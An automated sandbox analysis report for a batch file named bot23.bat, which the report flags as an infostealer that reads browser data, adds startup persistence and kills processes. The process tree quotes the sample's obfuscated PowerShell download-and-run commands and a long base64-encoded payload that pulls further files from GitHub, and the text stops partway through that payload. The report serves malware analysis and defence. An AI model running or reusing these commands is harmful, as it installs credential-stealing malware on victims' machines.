2c6e184f8ab0d72b37893c0ccc202067edf0957492bba85ef2fa2676b27eecec

Analysis

max time kernel
147s
max time network
116s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
24-05-2024 11:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bot23.bat
Size

330B
MD5

1137487e0274c696ee5378b5a01f0cdf
SHA1

9375478018a5b4a6c1c8bcf7ef20ecef36c2e700
SHA256

2c6e184f8ab0d72b37893c0ccc202067edf0957492bba85ef2fa2676b27eecec
SHA512

3c888e334ddcea60a716dcefad7fee34f3972e9b0b912b9c8584866b9d76d80864bb3d3a50a9091610f64ee2595b5f3daf665f5e6e8575d477b16acfd8bb72ef

Score

8^/10

execution spyware stealer

Malware Config

Signatures

Blocklisted process makes network request 20 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

flow	pid	process
8	3752	powershell.exe
10	3752	powershell.exe
15	3752	powershell.exe
25	2372	powershell.exe
38	376	powershell.exe
39	376	powershell.exe
40	868	powershell.exe
41	3984	powershell.exe
42	4600	powershell.exe
43	5256	powershell.exe
44	3688	powershell.exe
45	3940	powershell.exe
46	5400	powershell.exe
47	868	powershell.exe
48	3984	powershell.exe
49	4600	powershell.exe
50	5256	powershell.exe
51	3688	powershell.exe
52	5400	powershell.exe
53	3940	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
5400	powershell.exe
7028	powershell.exe
376	powershell.exe
4600	powershell.exe
3688	powershell.exe
868	powershell.exe
5256	powershell.exe
3940	powershell.exe
3984	powershell.exe
3752	powershell.exe
3752	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowSecurity.bat powershell.exe
Executes dropped EXE 1 IoCs

Processes:

python.exe

pid process

6788 python.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowSecurity.bat	powershell.exe

Loads dropped DLL 37 IoCs

Processes:

python.exe

pid	process
6788	python.exe
6788	python.exe
6788	python.exe
6788	python.exe
6788	python.exe
6788	python.exe
6788	python.exe
6788	python.exe
6788	python.exe
6788	python.exe
6788	python.exe
6788	python.exe
6788	python.exe
6788	python.exe
6788	python.exe
6788	python.exe
6788	python.exe
6788	python.exe
6788	python.exe
6788	python.exe
6788	python.exe
6788	python.exe
6788	python.exe
6788	python.exe
6788	python.exe
6788	python.exe
6788	python.exe
6788	python.exe
6788	python.exe
6788	python.exe
6788	python.exe
6788	python.exe
6788	python.exe
6788	python.exe
6788	python.exe
6788	python.exe
6788	python.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service
T1102

Processes:

flow ioc

7 raw.githubusercontent.com
8 raw.githubusercontent.com
25 raw.githubusercontent.com
64 raw.githubusercontent.com
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

68 api.ipify.org
69 api.ipify.org
70 ipinfo.io
71 ipinfo.io
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

4120 WMIC.exe

flow	ioc
7	raw.githubusercontent.com
8	raw.githubusercontent.com
25	raw.githubusercontent.com
64	raw.githubusercontent.com

flow	ioc
68	api.ipify.org
69	api.ipify.org
70	ipinfo.io
71	ipinfo.io

pid	process
4120	WMIC.exe

Enumerates processes with tasklist 1 TTPs 48 IoCs

Process Discovery

T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exe

pid	process
1108	tasklist.exe
6732	tasklist.exe
6616	tasklist.exe
1416	tasklist.exe
2416	tasklist.exe
4472	tasklist.exe
5428	tasklist.exe
5980	tasklist.exe
6448	tasklist.exe
3688	tasklist.exe
6772	tasklist.exe
2280	tasklist.exe
5240	tasklist.exe
6868	tasklist.exe
2756	tasklist.exe
5276	tasklist.exe
5152	tasklist.exe
7000	tasklist.exe
6856	tasklist.exe
5204	tasklist.exe
5856	tasklist.exe
5188	tasklist.exe
6292	tasklist.exe
5028	tasklist.exe
6360	tasklist.exe
1072	tasklist.exe
4836	tasklist.exe
3768	tasklist.exe
4360	tasklist.exe
4900	tasklist.exe
4032	tasklist.exe
6956	tasklist.exe
6832	tasklist.exe
1096	tasklist.exe
748	tasklist.exe
6612	tasklist.exe
6532	tasklist.exe
2196	tasklist.exe
6272	tasklist.exe
4804	tasklist.exe
5520	tasklist.exe
3240	tasklist.exe
7032	tasklist.exe
6752	tasklist.exe
1392	tasklist.exe
7036	tasklist.exe
6032	tasklist.exe
5092	tasklist.exe

Kills process with taskkill 5 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

2408 taskkill.exe
6620 taskkill.exe
5960 taskkill.exe
4844 taskkill.exe
6468 taskkill.exe
Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings powershell.exe

pid	process
2408	taskkill.exe
6620	taskkill.exe
5960	taskkill.exe
4844	taskkill.exe
6468	taskkill.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 42 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
3752	powershell.exe
3752	powershell.exe
2372	powershell.exe
2372	powershell.exe
2372	powershell.exe
2372	powershell.exe
2372	powershell.exe
2372	powershell.exe
2372	powershell.exe
3940	powershell.exe
3940	powershell.exe
3940	powershell.exe
376	powershell.exe
376	powershell.exe
376	powershell.exe
4600	powershell.exe
4600	powershell.exe
4600	powershell.exe
3984	powershell.exe
3984	powershell.exe
3984	powershell.exe
3688	powershell.exe
3688	powershell.exe
3688	powershell.exe
868	powershell.exe
868	powershell.exe
868	powershell.exe
5256	powershell.exe
5256	powershell.exe
5256	powershell.exe
5400	powershell.exe
5400	powershell.exe
5400	powershell.exe
7028	powershell.exe
7028	powershell.exe
7028	powershell.exe
1896	powershell.exe
1896	powershell.exe
1896	powershell.exe
6004	powershell.exe
6004	powershell.exe
6004	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeWMIC.exetasklist.exetasklist.exetasklist.exetasklist.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetasklist.exetasklist.exe

description	pid	process
Token: SeDebugPrivilege	3752	powershell.exe
Token: SeDebugPrivilege	2372	powershell.exe
Token: SeDebugPrivilege	3940	powershell.exe
Token: SeDebugPrivilege	376	powershell.exe
Token: SeDebugPrivilege	4600	powershell.exe
Token: SeDebugPrivilege	3984	powershell.exe
Token: SeDebugPrivilege	3688	powershell.exe
Token: SeDebugPrivilege	868	powershell.exe
Token: SeDebugPrivilege	5256	powershell.exe
Token: SeDebugPrivilege	5400	powershell.exe
Token: SeDebugPrivilege	7028	powershell.exe
Token: SeIncreaseQuotaPrivilege	5152	WMIC.exe
Token: SeSecurityPrivilege	5152	WMIC.exe
Token: SeTakeOwnershipPrivilege	5152	WMIC.exe
Token: SeLoadDriverPrivilege	5152	WMIC.exe
Token: SeSystemProfilePrivilege	5152	WMIC.exe
Token: SeSystemtimePrivilege	5152	WMIC.exe
Token: SeProfSingleProcessPrivilege	5152	WMIC.exe
Token: SeIncBasePriorityPrivilege	5152	WMIC.exe
Token: SeCreatePagefilePrivilege	5152	WMIC.exe
Token: SeBackupPrivilege	5152	WMIC.exe
Token: SeRestorePrivilege	5152	WMIC.exe
Token: SeShutdownPrivilege	5152	WMIC.exe
Token: SeDebugPrivilege	5152	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5152	WMIC.exe
Token: SeRemoteShutdownPrivilege	5152	WMIC.exe
Token: SeUndockPrivilege	5152	WMIC.exe
Token: SeManageVolumePrivilege	5152	WMIC.exe
Token: 33	5152	WMIC.exe
Token: 34	5152	WMIC.exe
Token: 35	5152	WMIC.exe
Token: 36	5152	WMIC.exe
Token: SeIncreaseQuotaPrivilege	5152	WMIC.exe
Token: SeSecurityPrivilege	5152	WMIC.exe
Token: SeTakeOwnershipPrivilege	5152	WMIC.exe
Token: SeLoadDriverPrivilege	5152	WMIC.exe
Token: SeSystemProfilePrivilege	5152	WMIC.exe
Token: SeSystemtimePrivilege	5152	WMIC.exe
Token: SeProfSingleProcessPrivilege	5152	WMIC.exe
Token: SeIncBasePriorityPrivilege	5152	WMIC.exe
Token: SeCreatePagefilePrivilege	5152	WMIC.exe
Token: SeBackupPrivilege	5152	WMIC.exe
Token: SeRestorePrivilege	5152	WMIC.exe
Token: SeShutdownPrivilege	5152	WMIC.exe
Token: SeDebugPrivilege	5152	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5152	WMIC.exe
Token: SeRemoteShutdownPrivilege	5152	WMIC.exe
Token: SeUndockPrivilege	5152	WMIC.exe
Token: SeManageVolumePrivilege	5152	WMIC.exe
Token: 33	5152	WMIC.exe
Token: 34	5152	WMIC.exe
Token: 35	5152	WMIC.exe
Token: 36	5152	WMIC.exe
Token: SeDebugPrivilege	6032	tasklist.exe
Token: SeDebugPrivilege	4472	tasklist.exe
Token: SeDebugPrivilege	5092	tasklist.exe
Token: SeDebugPrivilege	2196	tasklist.exe
Token: SeDebugPrivilege	2408	taskkill.exe
Token: SeDebugPrivilege	6620	taskkill.exe
Token: SeDebugPrivilege	5960	taskkill.exe
Token: SeDebugPrivilege	4844	taskkill.exe
Token: SeDebugPrivilege	6468	taskkill.exe
Token: SeDebugPrivilege	4836	tasklist.exe
Token: SeDebugPrivilege	6856	tasklist.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exepowershell.exeWScript.execmd.exepowershell.execsc.exepython.execmd.exepowershell.execsc.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 4600 wrote to memory of 3752	4600	cmd.exe	powershell.exe
PID 4600 wrote to memory of 3752	4600	cmd.exe	powershell.exe
PID 3752 wrote to memory of 2656	3752	powershell.exe	WScript.exe
PID 3752 wrote to memory of 2656	3752	powershell.exe	WScript.exe
PID 2656 wrote to memory of 1796	2656	WScript.exe	cmd.exe
PID 2656 wrote to memory of 1796	2656	WScript.exe	cmd.exe
PID 1796 wrote to memory of 2372	1796	cmd.exe	powershell.exe
PID 1796 wrote to memory of 2372	1796	cmd.exe	powershell.exe
PID 2372 wrote to memory of 3360	2372	powershell.exe	csc.exe
PID 2372 wrote to memory of 3360	2372	powershell.exe	csc.exe
PID 3360 wrote to memory of 2196	3360	csc.exe	cvtres.exe
PID 3360 wrote to memory of 2196	3360	csc.exe	cvtres.exe
PID 2372 wrote to memory of 3940	2372	powershell.exe	powershell.exe
PID 2372 wrote to memory of 3940	2372	powershell.exe	powershell.exe
PID 2372 wrote to memory of 376	2372	powershell.exe	powershell.exe
PID 2372 wrote to memory of 376	2372	powershell.exe	powershell.exe
PID 2372 wrote to memory of 4600	2372	powershell.exe	powershell.exe
PID 2372 wrote to memory of 4600	2372	powershell.exe	powershell.exe
PID 2372 wrote to memory of 3984	2372	powershell.exe	powershell.exe
PID 2372 wrote to memory of 3984	2372	powershell.exe	powershell.exe
PID 2372 wrote to memory of 3688	2372	powershell.exe	powershell.exe
PID 2372 wrote to memory of 3688	2372	powershell.exe	powershell.exe
PID 2372 wrote to memory of 868	2372	powershell.exe	powershell.exe
PID 2372 wrote to memory of 868	2372	powershell.exe	powershell.exe
PID 2372 wrote to memory of 5256	2372	powershell.exe	powershell.exe
PID 2372 wrote to memory of 5256	2372	powershell.exe	powershell.exe
PID 2372 wrote to memory of 5400	2372	powershell.exe	powershell.exe
PID 2372 wrote to memory of 5400	2372	powershell.exe	powershell.exe
PID 2372 wrote to memory of 6788	2372	powershell.exe	python.exe
PID 2372 wrote to memory of 6788	2372	powershell.exe	python.exe
PID 6788 wrote to memory of 6632	6788	python.exe	cmd.exe
PID 6788 wrote to memory of 6632	6788	python.exe	cmd.exe
PID 6632 wrote to memory of 7028	6632	cmd.exe	powershell.exe
PID 6632 wrote to memory of 7028	6632	cmd.exe	powershell.exe
PID 7028 wrote to memory of 6688	7028	powershell.exe	csc.exe
PID 7028 wrote to memory of 6688	7028	powershell.exe	csc.exe
PID 6688 wrote to memory of 5460	6688	csc.exe	cvtres.exe
PID 6688 wrote to memory of 5460	6688	csc.exe	cvtres.exe
PID 6788 wrote to memory of 3952	6788	python.exe	cmd.exe
PID 6788 wrote to memory of 3952	6788	python.exe	cmd.exe
PID 3952 wrote to memory of 5152	3952	cmd.exe	WMIC.exe
PID 3952 wrote to memory of 5152	3952	cmd.exe	WMIC.exe
PID 6788 wrote to memory of 5192	6788	python.exe	cmd.exe
PID 6788 wrote to memory of 5192	6788	python.exe	cmd.exe
PID 5192 wrote to memory of 6032	5192	cmd.exe	tasklist.exe
PID 5192 wrote to memory of 6032	5192	cmd.exe	tasklist.exe
PID 6788 wrote to memory of 3780	6788	python.exe	cmd.exe
PID 6788 wrote to memory of 3780	6788	python.exe	cmd.exe
PID 3780 wrote to memory of 4472	3780	cmd.exe	tasklist.exe
PID 3780 wrote to memory of 4472	3780	cmd.exe	tasklist.exe
PID 6788 wrote to memory of 5668	6788	python.exe	cmd.exe
PID 6788 wrote to memory of 5668	6788	python.exe	cmd.exe
PID 5668 wrote to memory of 5092	5668	cmd.exe	tasklist.exe
PID 5668 wrote to memory of 5092	5668	cmd.exe	tasklist.exe
PID 6788 wrote to memory of 3580	6788	python.exe	cmd.exe
PID 6788 wrote to memory of 3580	6788	python.exe	cmd.exe
PID 3580 wrote to memory of 2196	3580	cmd.exe	tasklist.exe
PID 3580 wrote to memory of 2196	3580	cmd.exe	tasklist.exe
PID 6788 wrote to memory of 4444	6788	python.exe	cmd.exe
PID 6788 wrote to memory of 4444	6788	python.exe	cmd.exe
PID 4444 wrote to memory of 2408	4444	cmd.exe	taskkill.exe
PID 4444 wrote to memory of 2408	4444	cmd.exe	taskkill.exe
PID 6788 wrote to memory of 5508	6788	python.exe	cmd.exe
PID 6788 wrote to memory of 5508	6788	python.exe	cmd.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\bot23.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4600

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
po"we"rsh"e"ll -ep bypass -w hidden -c Invoke-WebRequest https://raw.githubusercontent.com/Kiemtrau205/TestBot/main/vbs -o C:\Users\Public\security.vbs; Invoke-WebRequest https://github.com/Kiemtrau205/TestBot/releases/download/sasd/bot___.bat -o C:\Users\Public\security.bat; Start-Process C:\Users\Public\security.vbs
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3752

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\security.vbs"
3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2656

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\security.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:1796

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep by"pas"s -w hid"de"n -enc ZgB1AG4AYwB0AGkAbwB"uACAASABpAGQAZQAtAEMAbwBuAHMAbwBsAGUAVwBpAG4AZABvAHcAKAApACAAew"ANAAoAIAAgACAAIAAkAFMAaABvAHcAVwBpAG4AZABvAHcAQQBzAHkAbgBjAEMAbwBkAGUAIAA9ACAAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAYgBvAG8AbAAgAFMAaABvAHcAVwBpAG4AZABvAHcAQQBzAHkAbgBjACgASQBuAHQAUAB0AHIAIABoAFcAbgBkACwAIABpAG4AdAAgAG4AQwBtAGQAUwBoAG8AdwApADsAJwANAAoAIAAgACAAIAAkAFMAaABvAHcAVwBpAG4AZABvAHcAQQBzAHkAbgBjACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0ATQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAUwBoAG8AdwBXAGkAbgBkAG8AdwBBAHMAeQBuAGMAQwBvAGQAZQAgAC0AbgBhAG0AZQAgAFcAaQBuADMAMgBTAGgAbwB3AFcAaQBuAGQAbwB3AEEAcwB5AG4AYwAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAFAAYQBzAHMAVABoAHIAdQANAAoAIAAgAA0ACgAgACAAIAAgACQAaAB3AG4AZAAgAD0AIAAoAEcAZQB0AC0AUAByAG8AYwBlAHMAcwAgAC0AUABJAEQAIAAkAHAAaQBkACkALgBNAGEAaQBuAFcAaQBuAGQAbwB3AEgAYQBuAGQAbABlAA0ACgAgACAAIAAgAGkAZgAgACgAJABoAHcAbgBkACAALQBuAGUAIABbAFMAeQBzAHQAZQBtAC4ASQBuAHQAUAB0AHIAXQA6ADoAWgBlAHIAbwApACAAewANAAoAIAAgACAAIAAgACAAIwAgAFcAaABlAG4AIAB5AG8AdQAgAGcAbwB0ACAASABXAE4ARAAgAG8AZgAgAHQAaABlACAAYwBvAG4AcwBvAGwAZQAgAHcAaQBuAGQAbwB3ADoADQAKACAAIAAgACAAIAAgACMAIAAoAEkAdAAgAHcAbwB1AGwAZAAgAGEAcABwAGUAYQByACAAdABoAGEAdAAgAFcAaQBuAGQAbwB3AHMAIABDAG8AbgBzAG8AbABlACAASABvAHMAdAAgAGkAcwAgAHQAaABlACAAZABlAGYAYQB1AGwAdAAgAHQAZQByAG0AaQBuAGEAbAAgAGEAcABwAGwAaQBjAGEAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAkAFMAaABvAHcAVwBpAG4AZABvAHcAQQBzAHkAbgBjADoAOgBTAGgAbwB3AFcAaQBuAGQAbwB3AEEAcwB5AG4AYwAoACQAaAB3AG4AZAAsACAAMAApAA0ACgAgACAAIAAgAH0AIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAIwAgAFcAaABlAG4AIAB5AG8AdQAgAGYAYQBpAGwAZQBkACAAdABvACAAZwBlAHQAIABIAFcATgBEACAAbwBmACAAdABoAGUAIABjAG8AbgBzAG8AbABlACAAdwBpAG4AZABvAHcAOgANAAoAIAAgACAAIAAgACAAIwAgACgASQB0ACAAdwBvAHUAbABkACAAYQBwAHAAZQBhAHIAIAB0AGgAYQB0ACAAVwBpAG4AZABvAHcAcwAgAFQAZQByAG0AaQBuAGEAbAAgAGkAcwAgAHQAaABlACAAZABlAGYAYQB1AGwAdAAgAHQAZQByAG0AaQBuAGEAbAAgAGEAcABwAGwAaQBjAGEAdABpAG8AbgApAA0ACgAgACAADQAKACAAIAAgACAAIAAgACMAIABNAGEAcgBrACAAdABoAGUAIABjAHUAcgByAGUAbgB0ACAAYwBvAG4AcwBvAGwAZQAgAHcAaQBuAGQAbwB3ACAAdwBpAHQAaAAgAGEAIAB1AG4AaQBxAHUAZQAgAHMAdAByAGkAbgBnAC4ADQAKACAAIAAgACAAIAAgACQAVQBuAGkAcQB1AGUAVwBpAG4AZABvAHcAVABpAHQAbABlACAAPQAgAE4AZQB3AC0ARwB1AGkAZAANAAoAIAAgACAAIAAgACAAJABIAG8AcwB0AC4AVQBJAC4AUgBhAHcAVQBJAC4AVwBpAG4AZABvAHcAVABpAHQAbABlACAAPQAgACQAVQBuAGkAcQB1AGUAVwBpAG4AZABvAHcAVABpAHQAbABlAA0ACgAgACAAIAAgACAAIAANAAoAIAAgAA0ACgAgACAAIAAgACAAIAAjACAAUwBlAGEAcgBjAGgAIAB0AGgAZQAgAHAAcgBvAGMAZQBzAHMAIAB0AGgAYQB0ACAAaABhAHMAIAB0AGgAZQAgAHcAaQBuAGQAbwB3ACAAdABpAHQAbABlACAAZwBlAG4AZQByAGEAdABlAGQAIABhAGIAbwB2AGUALgANAAoAIAAgACAAIAAgACAAJABUAGUAcgBtAGkAbgBhAGwAUAByAG8AYwBlAHMAcwAgAD0AIAAoAEcAZQB0AC0AUAByAG8AYwBlAHMAcwAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAIAAkAF8ALgBNAGEAaQBuAFcAaQBuAGQAbwB3AFQAaQB0AGwAZQAgAC0AZQBxACAAJABVAG4AaQBxAHUAZQBXAGkAbgBkAG8AdwBUAGkAdABsAGUAIAB9ACkADQAKACAAIAAgACAAIAAgACMAIABHAGUAdAAgAHQAaABlACAAdwBpAG4AZABvAHcAIABoAGEAbgBkAGwAZQAgAG8AZgAgAHQAaABlACAAdABlAHIAbQBpAG4AYQBsACAAcAByAG8AYwBlAHMAcwAuAA0ACgAgACAAIAAgACAAIAAjACAATgBvAHQAZQAgAHQAaABhAHQAIABHAGUAdABDAG8AbgBzAG8AbABlAFcAaQBuAGQAbwB3ACgAKQAgAGkAbgAgAFcAaQBuADMAMgAgAEEAUABJACAAcgBlAHQAdQByAG4AcwAgAHQAaABlACAASABXAE4ARAAgAG8AZgANAAoAIAAgACAAIAAgACAAIwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAgAGkAdABzAGUAbABmACAAcgBhAHQAaABlAHIAIAB0AGgAYQBuACAAdABoAGUAIAB0AGUAcgBtAGkAbgBhAGwAIABwAHIAbwBjAGUAcwBzAC4ADQAKACAAIAAgACAAIAAgACMAIABXAGgAZQBuACAAeQBvAHUAIABjAGEAbABsACAAUwBoAG8AdwBXAGkAbgBkAG8AdwBBAHMAeQBuAGMAKABIAFcATgBEACwAIAAwACkAIAB3AGkAdABoACAAdABoAGUAIABIAFcATgBEACAAZgByAG8AbQAgAEcAZQB0AEMAbwBuAHMAbwBsAGUAVwBpAG4AZABvAHcAKAApACwADQAKACAAIAAgACAAIAAgACMAIAB0AGgAZQAgAFcAaQBuAGQAbwB3AHMAIABUAGUAcgBtAGkAbgBhAGwAIAB3AGkAbgBkAG8AdwAgAHcAaQBsAGwAIABiAGUAIABqAHUAcwB0ACAAbQBpAG4AaQBtAGkAegBlAGQAIAByAGEAdABoAGUAcgAgAHQAaABhAG4AIABoAGkAZABkAGUAbgAuAA0ACgAgACAAIAAgACAAIAAkAGgAdwBuAGQAIAA9ACAAJABUAGUAcgBtAGkAbgBhAGwAUAByAG8AYwBlAHMAcwAuAE0AYQBpAG4AVwBpAG4AZABvAHcASABhAG4AZABsAGUADQAKACAAIAAgACAAIAAgAGkAZgAgACgAJABoAHcAbgBkACAALQBuAGUAIABbAFMAeQBzAHQAZQBtAC4ASQ"BuAHQ"AUAB0AHIAXQA6ADoAWgBlAHIAbwApACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAUwBoAG8AdwBXAGkAbgBkAG8AdwBBAHMAeQBuAGMAOgA6AFMAaABvAHcAVwBpAG4AZABvAHcAQQBzAHkAbgBjACgAJABoAHcAbgBkACwAIAAwACkADQAKACAAIAAgACAAIAAgAH0AIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAIAAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiAEYAYQBpAGwAZQBkACAAdABvACAAaABpAGQAZQAgAHQAaABlACAAYwBvAG4AcwBvAGwAZQAgAHcAaQBuAGQAbwB3AC4AIgANAAoAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAB9AA0ACgAgACAAfQANAAoASABpAGQAZQAtAEMAbwBuAHMAbwBsAGUAVwBpAG4AZABvAHcADQAKAA0ACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIABoAHQAdABwAHMAOgAvAC8AcgBhAHcALgBnAGkAdABoAHUAYgB1AHMAZQByAGMAbwBuAHQAZQBuAHQALgBjAG8AbQAvAEsAaQBlAG0AdAByAGEAdQAyADAANQAvAHQAZQBzAHQAYgB5AHAAYQBzAHMALwBtAGEAaQBuAC8AcwB0AGEAcgB0AHUAcAAuAGIAYQB0ACAALQBPAHUAdABGAGkAbABlACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFMAdABhAHIAdAAgAE0AZQBuAHUAXABQAHIAbwBnAHIAYQBtAHMAXABTAHQAYQByAHQAdQBwAFwAVwBpAG4AZABvAHcAUwBlAGMAdQByAGkAdAB5AC4AYgBhAHQAIgANAAoAJABmAGkAbABlAHMAIAA9ACAAQAAoAA0ACgAgAEAAewB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8ASwBpAGUAbQB0AHIAY"QB1ADIAMAA1AC8AdABl"AHMAdABiAHkAcABhAHMAcwAvAHIAZQBsAGUAYQBzAGUAcwAvAGQAbwB3AG4AbABvAGEAZAAvAHMAbwBmAHQAdwBhAHIAZQAvAGQAbwBjAHUAbQBlAG4AdAAxAC4AegBpAHAAIgA7ACAAcABhAHQAaAAgAD0AIAAiAEMAOgBcAFUAcwBlAHIAcwBcAFAAdQBiAGwAaQBjAFwAZABvAGMAdQBtAGUAbgB0ADEALgB6AGkAcAAiAH0ADQAKACAAQAB7AHUAcgBsACAAPQAgACIAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwBLAGkAZQBtAHQAcgBhAHUAMgAwADUALwB0AGUAcwB0AGIAeQBwAGEAcwBzAC8AcgBlAGwAZQBhAHMAZQBzAC8AZABvAHcAbgBsAG8AYQBkAC8AcwBvAGYAdAB3AGEAcgBlAC8AZABvAGMAdQBtAGUAbgB0ADIALgB6AGkAcAAiADsAIABwAGEAdABoACAAPQAgACIAQwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABkAG8AYwB1AG0AZQBuAHQAMgAuAHoAaQBwACIAfQANAAoAIABAAHsAdQByAGwAPQAiAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8ASwBpAGUAbQB0AHIAYQB1ADIAMAA1AC8AdABlAHMAdABiAHkAcABhAHMAcwAvAHIAZQBsAGUAYQBzAGUAcwAvAGQAbwB3AG4AbABvAGEAZAAvAHMAbwBmAHQAdwBhAHIAZQAvAGQAbwBjAHUAbQBlAG4AdAAzAC4AegBpAHAAIgA7ACAAcABhAHQAaAAgAD0AIAAiAEMAOgBcAFUAcwBlAHIAcwBcAFAAdQBiAGwAaQBjAFwAZABvAGMAdQBtAGUAbgB0ADMALgB6AGkAcAAiAH0ADQAKACAAQAB7AHUAcgBsAD0AIgBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAEsAaQBlAG0AdAByAGEAdQAyADAANQAvAHQAZQBzAHQAYgB5AHAAYQBzAHMALwByAGUAbABlAGEAcwBlAHMALwBkAG8AdwBuAGwAbwBhAGQALwBzAG8AZgB0AHcAYQByAGUALwBkAG8AYwB1AG0AZQBuAHQANQAuAHoAaQBwACIAOwAgAHAAYQB0AGgAPQAiAEMAOgBcAFUAcwBlAHIAcwBcAFAAdQBiAGwAaQBjAFwAZABvAGMAdQBtAGUAbgB0ADUALgB6AGkAcAAiAH0ADQAKACAAQAB7AHUAcgBsAD0AIgBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAEsAaQBlAG0AdAByAGEAdQAyADAANQAvAHQAZQBzAHQAYgB5AHAAYQBzAHMALwByAGUAbABlAGEAcwBlAHMALwBkAG8AdwBuAGwAbwBhAGQALwBzAG8AZgB0AHcAYQByAGUALwBkAG8AYwB1AG0AZQBuAHQANgAuAHoAaQ